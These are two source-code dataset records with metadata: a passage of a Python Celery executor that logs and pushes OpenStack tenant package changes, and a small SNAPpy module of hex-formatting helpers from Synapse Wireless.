old_package=old_package.template.name, service_settings=service_settings, ) @classmethod def get_failure_signature( cls, tenant, serialized_tenant, new_template, old_package, service_settings, **kwargs ): service_settings = core_utils.serialize_instance(service_settings) return tasks.LogOpenStackPackageChange().si( serialized_tenant, event='failed', new_package=new_template.name, old_package=old_package.template.name, service_settings=service_settings, ) @classmethod def get_task_signature( cls, tenant, serialized_tenant, new_template, old_package, service_settings, **kwargs ): quotas = { quota_field.name: value for quota_field, value in _get_template_quotas(new_template).items() } push_quotas = openstack_executors.TenantPushQuotasExecutor.as_signature( tenant, quotas=quotas ) serialized_new_template = core_utils.serialize_instance(new_template) serialized_old_package = core_utils.serialize_instance(old_package) serialized_service_settings = core_utils.serialize_instance(service_settings) success_package_change = tasks.OpenStackPackageSuccessTask().si( serialized_tenant, serialized_new_template, serialized_old_package, serialized_service_settings, ) return push_quotas | success_package_change
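An editor's sketch (not part of executors.py): the `|` composition used in get_task_signature above is standard Celery canvas chaining of immutable signatures. The app and task names here are invented for demonstration.

# Illustrative Celery chaining with immutable signatures.
from celery import Celery

app = Celery('demo')

@app.task
def create_tenant(tenant_id):
    pass

@app.task
def set_ok(tenant_id):
    pass

# .si() builds an immutable signature (it ignores the parent's result),
# and `|` links signatures into a chain that runs left to right.
workflow = create_tenant.si(1) | set_ok.si(1)
# workflow.delay() would execute the chain on a worker.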
mit
-6,142,464,563,913,863,000
34.008197
103
0.656989
false
synapse-wireless/bulk-reprogramming
snappyImages/synapse/hexFunctions.py
1
1980
# Copyright (C) 2013 Synapse Wireless, Inc. # Subject to your agreement of the disclaimer set forth below, permission is given by # Synapse Wireless, Inc. ("Synapse") to you to freely modify, redistribute or include # this SNAPpy code in any program. The purpose of this code is to help you understand # and learn about SNAPpy by code examples. # BY USING ALL OR ANY PORTION OF THIS SNAPPY CODE, YOU ACCEPT AND AGREE TO THE BELOW # DISCLAIMER. If you do not accept or agree to the below disclaimer, then you may not # use, modify, or distribute this SNAPpy code. # THE CODE IS PROVIDED UNDER THIS LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTY OF # ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES # THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR # PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE # COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN ANY RESPECT, # YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY # NECESSARY SERVICING, REPAIR OR CORRECTION. UNDER NO CIRCUMSTANCES WILL SYNAPSE BE # LIABLE TO YOU, OR ANY OTHER PERSON OR ENTITY, FOR ANY LOSS OF USE, REVENUE OR # PROFIT, LOST OR DAMAGED DATA, OR OTHER COMMERCIAL OR ECONOMIC LOSS OR FOR ANY # DAMAGES WHATSOEVER RELATED TO YOUR USE OR RELIANCE UPON THE SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR IF SUCH DAMAGES ARE FORESEEABLE. THIS # DISCLAIMER OF WARRANTY AND LIABILITY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. # NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER. """Hex Functions.""" def hexNibble(nibble): ''' Convert a numeric nibble 0x0-0xF to the ASCII string "0"-"F" ''' hexStr = "0123456789ABCDEF" return hexStr[nibble & 0xF] def hexByte(byte): ''' print a byte in hex - input is an integer, not a string; returns a string ''' return hexNibble(byte >> 4) + hexNibble(byte)
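A brief usage sketch (not part of hexFunctions.py), assuming the two helpers above are in scope; SNAPpy uses Python 2 print statements, so the same style is kept here:

# Illustrative expected output of the helpers.
print hexNibble(0xA)   # "A"
print hexByte(0xAB)    # "AB"
print hexByte(7)       # "07"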
apache-2.0
-5,973,411,298,524,838,000
57.235294
85
0.759091
false